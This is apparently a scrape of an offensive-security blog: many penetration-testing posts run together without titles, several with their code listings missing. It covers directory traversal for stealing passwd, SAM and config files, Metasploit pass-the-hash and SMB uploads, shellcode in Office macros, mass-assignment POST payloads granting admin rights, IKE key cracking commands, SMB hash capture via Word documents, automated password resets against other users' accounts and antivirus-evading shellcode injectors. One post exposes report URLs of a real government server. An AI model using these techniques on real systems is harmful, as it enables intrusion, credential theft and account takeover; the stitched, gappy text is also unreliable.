Lines 25-26 - Select the inbox as the folder to pilfer and then instantiate a msgs object which has the results of all messages that haven't been deleted.'Lines 27-32 - If "msgs" (Array) is empty, print a message saying so, otherwise print that we are grabbing emails and invoke the place_emails_into_files method with both the msgs and imap objects.

Lines 35, 44 - define the method (place_emails_into_file) and close it off.

Lines 37-38 - Fetch the message with the message id (mid) we have created and then chomp any extra space off the end.

Lines 39-41 - Open the emails.txt file in the inbox folder (you've hopefully created) and write the message body into it (appending, NOT overwriting).

Line 43 - Invoke the create_file_with_tokens method.

Lines 46, 56 - define the create_file_with_tokens method and then close it.

Lines 47-49 - Create a new file which will contain the string you are trying to extract (the password) and then open the 'inbox/emails.txt' file for reading. Finally, on line 49 start iterating thru each line of the read_file ('inbox/emails.txt').

Lines 50-51 - Match the string you are looking for, if the m object (result of the match) is of a MatchData type, then put that string (password) into the "tokens.txt" or new_file, file.

Lines 53-55 - Close both files and print that we are done.

This should be able to run in Ruby versions 1.8.7 and greater. Ensure that you put your username and password in place of the ones I've entered on line 16.

In cktricky's last post he provided a great outline on the ins and outs of leveraging burp's built in support for directory traversal testing. There are two questions, however, that should immediately come to mind once you are familiar with this tool: How do I find directory traversal & what should I look for if I do?Finding directory traversal is the hunt for dynamic file retrieval or modification. The antonym, static file retrieval, is when the browser is delegated the request for a file on the server. In other words, every <a href>, css call for a file/location, and even most JavaScript calls can be considered static. You could copy the path of those requests into the browser address bar and grab the file yourself-- because that is pretty much what the browser is doing for you. Dynamic file retrieval, however, is when you request a server based page/function which serves you a file. Think of it as the difference between calling someone directly on the phone vs. calling an operator who calls that person and patches you in.Dynamic file serving takes place for a variety of reasons, such as: user content download locations, dynamic image rendering/resizing features, template engines, language parameters*, AJAX to services type calls, sometimes in cookies, and occasionally are how pages themselves get served. These all basically look something like: somefunction.php?img=/some/place/graphic.jpg or somefunction.php?page=/view/something

The path to the file can either be relative (../../../etc) or in some more rare cases absolute (c:/windows/boot.ini). Additionally, these requests might be base64 or ROT13 encoded or sometimes encrypted. Neither is a stop get.You might think language parameters are an odd location for directory traversal, but after talking with my co-workers*, they reminded be about dynamic file modification. Some frameworks use parameters (such as language) to prefix a directory to the request or alter the file name for the appropriate language. Ergo:

Language, template/skin name, or occasionally environment type variables (such as location=PROD, DEBUG, etc...). Anything that might be prefixed to a file name or directory to search is fair-game for that.

Now what?

Once you've identified a location which appears to be ripe for the testing-- how do you verify and what would you do? To verify, I have found two approaches that work well: default files & known files.The first approach is based on looking for default files on the file system. Since you are mostly blind to what exists on a server, you look for the existence of these defaults to see if they can be retrieved. There are two resources which I've found helpful. The first is Mubix's list of post-exploitation commands. In addition to a helpful list of commands for post exploit, the list includes very common files you might want to look for and steal (by operating system). The second resource is the Apache Default layout per OS. This can be really useful if you are attacking a system using Apache, to grab known configurations. For non-Apache web servers, I usually install them locally and see what the default layout looks like manually.The second approach comes into play if the first fails (and it might) because the user-context of the site doesn't have the authority to access those files. So you have to request files you can be reasonably sure it has access to-- the webpages it already serves. In this approach you attempt to serve other parts of the webpage, relative to the location you are currently looking at. As a contrived example, say you see a layout something like: /mainpage.asp /vulnerableFeature.asp?path=/images/some-image.jpgyou'd test for: /vulnerableFeature.asp?path=../mainpage.asp /vulnerableFeature.asp?path=/mainpage.aspSince you know that the user-context of the site has the authority to serve those pages, it -should- be a fairly practical way to verify if your directory traversal is working. You may even get back source code this way. :-)If you are attempting to take over the server, you should be looking to steal resources which would help you with that (such as the passwd & sam files). If you are attempting to do an involuntary code review, you should steal the source code from the pages you are looking at. There are occasionally hard coded credentials source, but application configuration files are often gold for credentials. I've found database, admin users, SMTP credentials and FTP users this way.

Some final things to consider:

Most operating systems support the use of environment variables/shortcuts for locations such as %home% or ~. This is useful to remember if there are protections against using a period or two successive periods.

When dynamic features serve files, they often violate other protections. In IIS for instance various extensions cannot be served by the server (.config files for instance). However in most directory traversals you can pull the web.config file out w/o many problems.

User controlled uploads often get served dynamically because there isn't a way for the server to know before-hand what the files are. You can sometimes find directory traversal here by uploading files with weird path's in their names (or renaming them after upload).

Developers sometimes leave clues to file's physical locations in comments. I once downloaded a source for an entire site because of this.

Often, I'll use Burp Suite's directory traversal Intruder payload list. A step exists that must be performed in order to effectively leverage the traversal payload. We'll briefly cover this.

Intruder with the insertion point (fuzzing the file parameter)

Burp's fuzzing-path traversal payload, available under the preset list payload set, has a placeholder that represents the filename you'd like to fuzz for. This placeholder "{FILE} ", must be substituted with an actual filename (ex: /etc/passwd).

As you can see, the additional step was adding a payload processing rule. We chose match/replace, escaped characters that represent regular expressions (curly braces {}) by placing a backslash in front of them and replaced them with etc/passwd.

Lastly, don't forget to select/deselect the URL-encoding of characters based on your needs.

scriptjunkie recently had a post on Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there. How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.

The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application.

I ended up having to use the smb/upload_file module on a pentest. I was able to get the local admin hashes but for some reason the psexec module wouldn't get code execution, it would act like it would work but wasn't. So we decided to push a binary, use winexe that was modified to pass the hash to exec the binary as needed. It went something like this... ################################################### add a route to the 10.x network thru session 1##################################################

######################################################## psexec wouldnt work. AV eating metsvc most likely...# used smb/upload_file to place a binary on the box######################################################msf exploit(handler) > use auxiliary/admin/smb/upload_filemsf auxiliary(upload_file) > info

Name Current Setting Required Description ---- --------------- -------- ----------- LPATH yes The path of the local file to upload RHOST yes The target address RPATH yes The name of the remote file relative to the share RPORT 445 yes Set the SMB service port SMBSHARE C$ yes The name of a writeable share on the server

Description: This module uploads a file to a target share and path. The only reason to use this module is if your existing SMB client is not able to support the features of the Metasploit Framework that you need, like pass-the-hash authentication.

###################################################################### Use winexe with pass the hash to get cmd shell and run the binary#####################################################################

When application security was still in it’s infancy, there were discussions on how to protect applications from newly discovered injection vulnerabilities. "Sanitize Input" was a popular solution that rolled off the tongue nicely and was not overly complicated to explain. It was also, a very generic solution that would (hopefully) be part of a more complete approach.

As much as "Sanitizing Input" makes sense, so does writing your code in a way which, allows you to handle failure safely. This way, when the unexpected does happen, an entire operation doesn't fall down, introduce a bug or propagate unsafe data.

Question: When does this approach fail miserably?Answer: When it is the only approach you have.

The OWASP Top 10 categorizes XSS and SQL Injection separately. As an attacker, you are injecting data that is handled insecurely by application code. In this way, it is really just another form of injection. On that note, let’s discuss two manifestations of injection. SQL Injection and HTML Injection (XSS). I'd like to demonstrate other ways to think about or handle data beyond just "Sanitize Input". If you take away nothing more from this article, I'd like it to be that applications are unique, there is a level of complexity to design choices and solutions and there are more options than "Sanitize Input" available.

SQL Injection: "Save your one-liners for the bar". Parametrization of database queries is a classic method for handling queries safely and in many cases more efficiently. From a security standpoint, parametrized queries help to solidify the boundaries between user data and SQL statements. It ensures that data submitted by the user will be separated from the actual database query and won’t interfere with the SQL code and ultimately the database.

Example of lazy code....

http://www.example.com/example.php?user_name=gevans

$uname = $_GET['user_name']

....and this is the classic example everyone shows, nothing new here, that illustrates a SQL Injection flaw where the data ($uname) is actually included in the SQL statement.

"SELECT user_id from users where username = $uname;"

This programming flaw has destroyed the boundary between the SQL command and user-supplied input. Because the user data is now cast as a string-- it is no longer clear to the SQL server what part was supplied by the developer and what was supplied by the user. The whole query can fall apart by appending double quotes. This is not just a vulnerability, this is bad programming. Sure, it takes one line to write the query but there is no further sanity checking here. The string is formed, sent to the server, and executed as SQL. How are parametrized queries different?

Parametrized queries separate the data from the query so that we as coders don’t miscommunicate our intentions to the database server. How does it work? The majority of the query is sent to the server MINUS the actual user submitted data. So, the query is prepared (meaning sent to the server), a response comes back with a token (minus MySQL as I understand it), and THEN, the variable is sent to the server with the token and a SQL query executes. This means the expected query and actual data that we've gathered from the user are separated prior to execution.

Lets provide a visualization

// Pass in db credentials as well as the host it is located on and the database we'd like to connect to

//Execute the query, taking in the variable data ($uname) from the user$q = $conn->prepare($sql);$q->execute(array($uname));$object = $q->fetchColumn();

As you can see, the $sql statement is prepared and the server knows exactly what it should look like. Next, the SQL statement is executed, passing in the variable value in place of the "?" (shown above). By specifying that question mark, you tell the db, this is my statement but I don't know what the value will be.....I'll give you that on the next call.

Lets examine XSS. Again, something I hear a lot is "Sanitize your input". Some people even go as far as "Whitelist" versus "Blacklist". Okay, great, that is not extensible and ultimately context matters. What do I mean? It is a very one-sided approach with a lot of assumptions. Let me draw a picture for you. The understanding, as of right now, is the data comes in one place and is potentially echoed in another. So the model looks something like this:

A typical example would be a registration form. You sign up with your First Name, Last Name, etc. Upon successful authentication to the application, you notice a little message at the top right.... So....."Welcome, Ken!", I wonder where that value came from? When we registered, our information was stored in the db, later extracted after login, and shown on the page. Now, we should be safe right? Even if we had attempted to place JavaScript in the First Name value upon registration, it wouldn't have mattered.....We Sanitized!!! Two months later, a user complains that they signed up with a misspelled username and would like the ability to change it. A new developer is assigned the task of adding the ability to edit your first and last name and does so. The new developers assumption is that we are going to safely handle that data when rendered to the user. But we aren't. We sanitized the input and didn't bother with handling the data. Our model has changed from Input/Output to......

So with one additional point of input, our model gets (very slightly) more complicated. Now imagine adding multiple points of input, multiple points of output. Now split input into data entry (processed), storage handling (stored in the db) and then do the same for output. While we are at, lets throw a web-service that consumes the data as well. It becomes very easy to see how "Sanitize Input" doesn't scale, isn't a sure-fire solution, and really oversimplifies the problem for those who are looking to either receive or give an easy answer.In summary, please join me in the fight to stop the mindless regurgitation of old material.Cheers,Ken

Over the last two cycles of OWASP top 10, insecure direct object reference has been included as major security risk. An object reference is exposed and people can manipulate that to access other objects they aren’t supposed to. But an apparently lesser-known problem is when the object itself is directly exposed. This happens when an object maps user-controlled form data directly to it’s properties with out validation.

Perhaps this issue gets less press because every language calls this problem something different. In ruby, people call this mass assignment. In .NET and Java it’s often referred to as reflection binding. Regardless of name, it is how the object obtains it’s data which is of concern.

In ruby, vulnerable code might look like this:

@foo = Foo.new(params[:foo])

The params call wants to make life easy and will automagically map any form data that matches the object’s parameters for you—unless you say otherwise. This is a very common convention used in MVC frameworks, because manually mapping a form POST to an object is annoying. The problem here is that it makes no difference to the controller whether you’ve exposed that field in the presentation layer. It just has to exist on the object.

In other words-- if you were updating a product quantity for your shopping cart, you might be able to change the price by guessing that a price field exists. Just add the price field to your POST parameters and it might override the value. This approach can be effective—but it is mostly a guessing game at that point. Some frameworks let you throw tons of arbitrary data and whatever sticks, sticks. Others will barf on invalid parameters.

There is a second route, however, which is why vulnerability deserves more attention. When I said that you are allowed to map to anything on the object, I meant it. You can map complex objects to other complex objects, as far as they related to each other. Lets look at an example in C#:

Behind the scenes, the framework maps all of the form data directly into the foo object. Developers also sometimes do this directly by calling the UpdateModel() function. In either usage, if someone sent a malicious POST to the “Create” view:

Foo.Bar.name=“hello”&Foo.Bar.is_admin=true&Foo.name=“myfoo”;

You’d end up with a full fleshed out object where:

Foo.name = “myfoo” Foo.Bar.name = “hello” Foo.Bar.is_admin = true

The Bar object is instantiated automatically through it’s empty constructor, and it’s properties are mapped as well. Any reference the exposed object has, you can bind to. This also works for arrays of simple or complex types too. If instead of a single instance you had an array or List<Bar> you would just do the following:

Foo.Bar[0].name=“hello”&Foo.Bar[0].is_admin=true

With out any other validations, this is all kosher.

In the wild I’ve used this attack to escalate privileges by updating my profile and walking down to a permissions table. I’ve also run across places where you could register every user to come to an event. And another instance where you could take over other people’s blog posts simply by editing your own profile.

If you search for this during tests, here are some key things I’ve learned:

This vulnerability is best identified with access to source code—and very few developers seem to protect against it.

When reviewing code, pay attention to how the constructor works and how fields are set on the object. Some properties are set via functions and you can’t bind them directly. Other objects don’t have empty constructors. This causes the attack to fail.

I frequently find this vulnerability on “update” and “create” controller actions.

You can, and I have, found this w/o source—its just harder. You do so by creating a loose type map through browsing the site.

You can create a type map by following a process like this:

Going to the object's “create” page and note all the form fields that are there. That is your basic “object”. As you see these objects in other places on the site, they might reveal more about their structure.

The site will guide you in what you need to know about object relationships. If you are looking at your cart, and it has a list of products & their details-- the cart object has a list of products.

For everything else, there are common object relationships you can just assert. Carts do generally have products, just as people generally have permissions. Take some time and look over common object models on the interwebs.

This attack route exists on pretty much every MVC based framework. In particular, Spring, Struts, MVC.Net and Ruby on Rails are all vulnerable. Maybe others, but those are so popular I’ve not really looked much deeper into it.

It is true that developers can prevent this by white listing specific fields to bind—but they don’t. The whole point of the convenience functions is convenience. If you’ve built an MVC application and didn’t go out of your way to protect against this—you are most likely vulnerable to it.

Stephen, @averagesecguy, wrote a post on owning a ColdFusion server. its pretty good and he wrote some code to help things along.

Code: https://github.com/averagesecurityguy/scripts

I thought I'd add to the conversation with some stuff I found doing CF research. The code he wrote and the metasploit module works great if things are in their default locations. Of course, this will never be the case when you are on a PT and need to break into that mofro.

Anyway, there is a misconfiguration that, when its present, can greatly help you exploit that locale traversal attack. Alot of time you can get the sha1.js and verify that the patch is not applied.

Anyway, more than once I've gotten that far but the host was Linux and locating the password.properties file failed. You're essentially guessing blind. So what i discovered is that sometimes the componentlist.cfm [Site/CFIDE/componentutils/componentlist.cfm] file is available. It looks like this:

Click on one of the components and you get full path to the installed component:

Not the best example, because stuff is where we would expect it to be. This one is better:

Now you know where to direct that directory traversal to get the proper file.

So assuming we have some sort of SQL Injection in the application (Blind in this case) and we've previously dumped all the available databases (--dbs), we now want to search for columns with 'password' in them.

We now know that we want to go back and enumerate/dump the column values from dbo.mytable and database MYDATABASE to see if there is anything good there. Mostly likely there is also a userID or LogonId in there we need to extract as well.

In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK.

This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure.

Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset=

$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134keyRunning in brute-force cracking moddeBrute force with 63 chars up to length 5 will take up to 992436543 iterations

You may find yourself wanting a bit more flexibility or options during bruteforcing or dictionary attacking (i.e. character substition). For this you'll need to use Cain. The problem I ran in to was Cain is a Windows tool and ike-scan is *nix. I couldnt get the windows tool that is floating around to work. Solution...run in vmware and have Cain sniff on your VMware interface. The PSK should show up in passwords of the sniffer tab, then you can select and "send to cracker". Its slow as hell, but more options than psk-crack.

Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...

In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.

I ended up addind the following code to the office document (replace "[" or "]" with "<" or ">":

Once that is done go to insert-->object--text from file-->select your HTML file

Once that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.

I am now working on pentest in a government unit in Hong Kong, they simply expose numerous sexy confidential reports in their Oracle Report Server:

I would like to highlight two interesting points:1. Execute servlet commandshttp://reports.somethingoracle.com/reports/rwservlet

2. Get some confidential reports from Google or targetinurl:reports/rwservlet

For example, you could know other project fund from governmenthttps://app.somethingoracle.com/reports/rwservlet?epm+report=epm345_stip_report.rdf+p_stip_year=2009+p_incld_transit=YES+p_break_type=R+p_draft_rept=NO

We work in a variety of large environments, networks from 30k hosts up to 100k hosts and like many of you one of our jobs is to provide security advice to our customers. In the infosec industry many times this advice involves recommending things like patching, AV selection, FW rules, SEIMs, reverse engineering tools, app review, etc. (and most often purchasing more assessments ;)

However what we are finding most often is many places aren't even ready to deal with implementing advanced security as their basic IT operations are not in order. How many times have you pen tested a customer and heard "oh yeh that belongs to the desktop support group, good luck getting anything done there"?

Many times we have generated a number of serious alerts on a sensitive server including the use of stolen cached domain admin credentials, password dumping tools and even rebooting the server itself. We will see a ticket generated in the support system, an admin looks at the sever, fills out the ticket and says: "AV caught the attempt and the server came back up fine" ticket closed. Often users won't report anything suspicious, even when our actions are blatant, because they are so accustomed to everything being broken and unstable.

Beyond automating patch Tuesday and keeping AV up to date, and definitely beyond exploits, memory protections and reverse engineering, the most serious problem in security is that organizations lack even basic capabilities in managing their enterprises. Who's running still running XP SP2 (a vastly less secure OS than Win7) because of the expense involved in updating the enterprise? Businesses need security help that is willing to negotiate the maze of business concerns and understand enterprise IT needs in addition to being technically astute in security.

We've been to large companies where getting a network port to plug into to start testing can take 2 weeks. Where finding someone who understands how servers are configured or even how many servers there are can be a challenge. Environments that don't know what computers are on their own networks. Sure security needs to be built into the whole process, but I wonder, have we focused too much on what we want to do and not enough on what the customer's actually need?

Its not sexy or headline generating work, but little is more critical.

After testing a fair number of mobile applications I thought I would share 3 of the most common vulnerabilities I've come across thus far. In regards to scope, when referring to "mobile applications", we really mean both the mobile application and the web-service.

Moral of the story is, if a mobile device is lost or stolen (happens way more often than it should), credentials are ripe for the picking. Physical access is not always required of course. Anyway, pretty much anyone who has spent 2 minutes on "The Googles" can find out where you are storing your metaphorical "house keys". There are solutions to this problem, for instance, I've heard great things about Android-SQLCipher and don't forget about platform API solutions as well (if your not a fan of third party libraries).

Crappy session handling:

I don't think this title will ever make its way on to an OWASP Top 10 but it certainly reflects the issue accurately. Not to say this is limited only to Mobile Apps & Web Services, far from it, it is just very common amongst them.

Examples -

So, here is a fun one, pure basic-authorization schemas . You typically see this in a SOAP-service-to-Mobile-App architecture but obviously the two aren't mutually exclusive. For those not familiar with basic-authorization, it means the user's credentials are sent in the standard basic-auth format (Base64 encoded user:password). The problem occurs when, instead of leveraging a session handling schema, the user/password combo is sent with every request to the web-service as a means to authenticate the user for the requested resource. There are many disadvantages. Namely, if SSL isn't in play, you've increased the likelihood that the credentials will be stolen (ahhh....... lattes, croissants and good ol' packet sniffing). Additionally, because you haven't a session to destroy, there is no inactivity lock-out. Typically the creds are stored (plain-text of course) on the device, retrieved by the app and then sent in the request on a per-request basis. This means, the person on that device may not be the person you intended to view potentially sensitive information.

Another big session-related issue is leveraging device identifiers or good old client-side data to control privileges of a user. Imagine the classic parameter tampering (userid=100 becomes userid=101) but this time with the UUID of an iPhone device. The classic session identifier -> user map -> role enforcement still works so it is unnecessary to build your schema in this way.

API Keys, Test Accounts and Dirty Laundry

From test account credentials along with the test URL, which provided juicy insight into the inner workings of an architecture to the personal email addresses of developers (think - social engineering/username enumeration), the list of things put into the source code can still be fairly surprising.

These applications are reversible. Especially Android apps, between dex2jar/apktool/jd-gui.......its pretty easy to see things not intended for your eyes. Developers need to scrub sensitive data prior to sending the code out for production and treat data like its a public blog post......everyone can read it. Oh, and make sure you aren't hard-coding API or encryption keys!

Okay, so those titles will never end up on a Top 10 but the content has! I would encourage those interested to check out the OWASP Mobile Top 10 Risksand please, don't forget the project always needs additional collaborators.

[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92

+ Results found on 192.168.1.92+ - Port http (80/tcp) is open [i] Plugin ID 38157 Synopsis : The remote web server contains a document sharing software Description : The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personel can log into this site See also : http://www.microsoft.com/Sharepoint/default.mspx

Solution : Make sure the proper access controls are put in place

Risk factor : None

Plugin output : The following instance of SharePoint was detected on the remote host :

Similar to his other TED talk but worth the 20min. Its good up to "fixing things". Not sure I agree with his "fixes". I do agree with a more unified way to fight/arrest/ cyber criminals, but bottom line its still way too easy to break into stuff and still to easy to conduct Credit Card fraud. We need to adress some of that as well.

Also, I think plenty of people would disagree that anything Mac is "safe" because of market share.

I remember many years ago writing my first buffer overflow, a standard stack bug privilege escalation in I think RedHat 7x which I thought was awesome. I remember writing my first SEH overwrite on windows and marveling at POP POP RET's and spending hours pouring through memory in Windbg wondering why my shellcode was getting trashed. I even remember the moment when I "got" return to libc. Somewhat in contrast to many "researcher" exploit developers and bug hunters, I also break into computers, lots of them. At last count I was well over the 100,000 mark of computers I have personally gotten into, control over and extracted data from. This is not to tell you how awesome I think I am (I'm not, there are IRC script kiddies with 10x the amount of compromises under their belt) but rather provide a statistical frame of reference for what I am going to say next.Several years ago I decided to pull back from the memory corruption rat race, but I never really talked about why.When breaking into computers, I almost never use memory corruption bugs. I occasionally, but rarely develop new memory corruption bugs into exploits. Memory corruption bugs IMO are a bad long term return on investment. Sure someone like Charlie Miller can crank out 100 Adobe product crashes in the blink of an eye, but how much skilled time investment is required to take a bug from a crash to a highly reliable, continuation of execution, ASLR / DEP bypassing exploit ready for serious use? Average numbers I have heard from friends who do this all day long are 1 - 3 months, with 6 months for particularly sticky bugs. How many people are there that can do this? Not many. So you have a valuable resource tied up for months at a time to produce a bug which may get discovered and published in the interm ( a process you have no real control over), patched and killed. When was the last time you heard about a really bitchin Windows 7 64bit remote? Its been a while. So you put in all that time and investment to produce a nice 0day only to watch it get killed. Then you start looking for the next one. What's the going price on the market for an 0day? 100k, 200k, etc. Expensive for something with a potentially limited life putting aside that fact that people don't patch anyway for a moment.So what do I like instead then? I like design flaws that are integral to the way a system works and are extremely costly to fix, that don't barf a bunch of shellcode across a potentially IDS/IPS ridden wire, that simply take advantage of the way things are supposed to work anyway. Lest you think I spend all my time keylogging "password123" let me give some real world examples:- Proprietary & custom hardware/OS and software system used for some interesting applications. System has a UDP listening service. After reversing the service binary we discovered that it takes a cleartext, unauthenticated protocol blob. The process then, based on whats in the blob, calls another process that execs a variety of system commands. One of these commands sends out a message to the various systems in the network to mount a given network file system and load specified software. So we craft our own protocol blobs build our own network file system with specially crafted malicious software and take over all the systems at once. We spoke with the designers of the system about what it would take to change it, and due to various rules and policies we were looking at 18-24 months to push out a redesign, and thats after whatever time was needed to develop the new system.- Foreign Client/Server ERP system that handles supply chain and even has some tie ins with some SCADA components. Authentication works as follows: Client enters a username and password. Client app connects to the server and sends an authentication request with the provided Username. The server checks to see if the username exists and if so it sends a hash of the user's password back to the client app. The client app checks to see if the local password hash matches the one sent from the server and if it matches the client informs the server the the account is valid and the server then successfully authenticates the client. So yes, very broken client side authentication. But to figure that out we had to analyse the network traffic between the two as well as reverse engineer the client application and binary patch the client app to always respond with a positive match. And the data or effects gained from compromising this system are way more interesting than your windows 7 home gaming system.- Large company virtualization cluster using hardware from a well known vendor. Servers provide remote console / kvm functionality for management. Because of a previously unknown authentication vulnerability in the remote console app we were able to boot the server to remote media under our control (i.e. a linux boot disk). We had reverse engineered the virtualization technology in question and developed a custom backdoor which we then implanted by mounting the hard drive from our remotly loaded linux boot environment, allowing us to take control of the cluster.With the exception of the last server reboot none of these above examples generated any traffic or logs that were flagged by any security system. No IDS or AV to evade. No DEP or ASLR to get around. And low chance of these bugs getting killed due to the cost and time frame involved in fixing them. I believe that researchers should consider putting some of their time and resources into the above types of design flaws as well as in sophisticated post-exploitation activities. The market value for memory corruption bugs will go up for a while but so will the difficulty and time required to find them, and we have often seen patch release times decrease as well. Eventually that bubble will burst.V.

Dave Ferguson has beaten up on forgotten/reset password functionality for some time and recently participated in an OWASP podcast where he discussed these problems. The podcast reminded me of some techniques I've used in the past which have been successful and may be worth sharing. Accessing other user's accounts with insecurely coded forgot/reset password functionality is more common than you might think.

This posts focuses on analyzing entropy and inline password resets, two major problems with forgot/reset password functionality. To do this, we have to automate both requesting a forgot password hundreds of times and parsing thru all of the e-mails we receive. Thanks to the recently added macro support now available in Burp (thanks PortSwigger), less effort is required on our part when an application employs anti-automation features to prevent such attempts.

For those not familiar with BurpSuite's Macro support, lets walk thru this.

So here is a picture of the email reset we've been sent:

To initiate a password reset request it is a four part request & response pair sequence. This sequence is saved in our proxy history. We need to navigate to Options > Sessions > Macros > New and highlight the four messages saved in the proxy history to create and configure the new macro.

Take a look at the screenshot below:

Okay now we need to configure each individual request/response to extract data we want. We have to grab a JSESSIONID and a struts token. Lets highlight the first request/response and configure.Example of configuring one of the items

You'll notice that for the first request I've chosen to not use cookies in the cookie jar. This is because I want to start the sequence clean and without a cookie.Notice the struts.token.name and struts.token are dynamic and changing so we derive these from the response. The rest are preset values like email and birthdate (no, not my real birthdate). One thing that is important to notice is that I've decided to uncheck URL encode for the email portion. It is already URL encoded so no need. Otherwise it will cause problems.

Name the Macro The next piece requires you to add the macro to a session rule. Again Options > Sessions > Session Handling > New. Highlight the macro you'd like to use.

Next, you'll need to add the pages to scope:

Now send the original, first request (I do this at the proxy history portion of Burp) over to intruder, select null payloads and set it for a number that is large enough to collect a big portion of passwords so we can review entropy. You'll see below that Intruder is configured to send the password reset sequence 800 times. Again, this will initiate the macro each time, so you are essentially resetting the password 800 times.Next we need to retrieve the emails from gmail and review them for entropy. Here is a script I've written to retrieve emails from gmail, parse for the password values and write to a file called tokens.txt:

Lines 11-17:

Line 12: File we will place all of our emails in (make sure you create an inbox folder) Line 13: Initialize Pop class Line 14: Enable SSL Line 15: Replace with your username and password Line 16: Call the check_for_emails method with the pop obj

Lines 20-27:

Line 21-22: If we no emails, print that fact out to the screen Line 24-25: We have emails, print that fact to the screen and call place_emails_into_file method with the pop object.

Lines 31-36:

Line 31: Iterate thru pop array Line 32: Open the file (line 12) Line 33: Write the messages to the file Line 36: Call the create_file_with_tokens method

Lines 40-53:

Line 41: Create a new_file object which is a file called tokens.txt Line 42: Create a read_file object which reads the inbox/emails.txt file from Line 12 Line 43: Begin reading each line from the read_file Lines 44-46: If the line matches the "password: somepassword" write it to a file. Line 53: Kick the whole thing off

Review the tokens.txt file

We can see that the new passwords sent aren't very random. We can load this in burp sequencer but there really isn't any point when it is this easy. It is obvious that the developer has two separate arrays of words and and another array of numbers. They pick "randomly" from that pile and concatenate the values. Here is the actual line of code I wrote to do this and yes this is a real-life example that I've come across:

Factors that could slow us down:

1) If we can't enumerate e-mail addresses somehow. An example of enumeration would be if you type in a username/e-mail address and and the site tells you it doesn't exist. Now we know who DOES exist on the system.

2) This particular site requires a birthdate along with the email address. This is difficult but not impossible. If we know the e-mail address exists it is a matter of guessing the birthdate (automate w/ Intruder).

3) After we've reset other user's passwords, we need to guess the password (made MUCH easier by reviewing the entropy). If an account lock-out policy is enforced (after a small amount of incorrect password submissions) the account may be locked out leaving us without access. That is no fun.

Even if the reset or forgotten password function doesn't send us a clear-text password it may send us a reset link. It is important to review the randomness of that link.

Here is an example of loading the tokens file in sequencer:

Summary:

We've bypassed struts token and multi-flow password resets which might have been intended to slow us down. We've collected all of our emails and parsed them for passwords/tokens/links. We've manually (in this case) reviewed the entropy but we can also do this with sequencer. Now we have a way to guess passwords more efficiently and in combination with other flaws leaves us just a short period of time from compromising accounts.

Hi dudes, we have got a studies over facebook forensics, please feel free to reference and enjoy it from here. Special thanks to Captain's leading on this studies, Taku and Sweeper's analysis and Leng's detailed paper review:http://goo.gl/2TIr9

You may find yourself needing to do process injection outside of metasploit/meterpreter. A good examples is when you have a java meterpreter shell or you have access to gui environment (citrix) and/or AV is going all nom nom nom on your metasploit binary. There are two public options I have found; shellcodeexec and syringe.

Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject that into memory (process for syringe) and get your meterpreter shell.

shellcodeexec is a small script to execute in memory a sequence of opcodes.

"It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode."

"Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours."

"Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec). It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included)"

Ken "cktricky" Johnson has agreed to join the carnal0wnage/attackresearch blog and I cant be more excited. Ken brings tons of webappsec kung fu and is the core developer for wXf. He should be adding lots of webappsec goodness.

Strategic Security has teamed up with Net-Square to provide the most comprehensive exploit development course package available to the public. Occasionally similar courses are offered privately to various three letter agencies and large financial institutions.

Exploit development is often considered the most difficult area of focus in the entire field of IT security. It requires both a broad range of skills and deep level of knowledge in Networking, Operating Systems, and Programming. Now you too can learn what has long been thought to be "Black Magic" by many from one of the top practitioners and trainers in the world.

How is this course put together?The course is actually a 2 week package deal designed to both teach the fundamentals of modern exploit development and give the student ample guided practice time with the instructor to actually get proficient.

Dudes, I and two other fellows have dealt with an incident about a victim whose online banking account has been compromised and a huge lumpsum of money is transferred out to eastern europe. In fact, the victim is still using the old two-factor authentication token, it means we cannot identify the generated passcode is for authentication, money transfer to a specific account , bill payment, etc, attacker manipulates it indeed. Please download it from here. goo.gl/FVFBOEnjoy it, mate ;-)

I've created a video on how to use the latest module addition to the buby family of modules in wXf. The purpose behind the module is to search Burp's history and seek out parameters in requests to an application which match our list of keywords. The keywords are basically parameters that might warrant manual analysis.

Consider we've made the following requests:

http://www.example.com/welcome.php

http://www.example.com/resource.php?accountid=

http://www.example.com/help.php?page=1

Most folks would agree that the request with a parameter of accountid warrants some manual analysis. On a larger scale (think thousands of requests), this can be tedious to search and then send to intruder or repeater. So the idea is that we have a keyword list to help speed things up, when a match is found, an alert is sent to burp and the request is sent over to repeater & intruder for manual analysis.

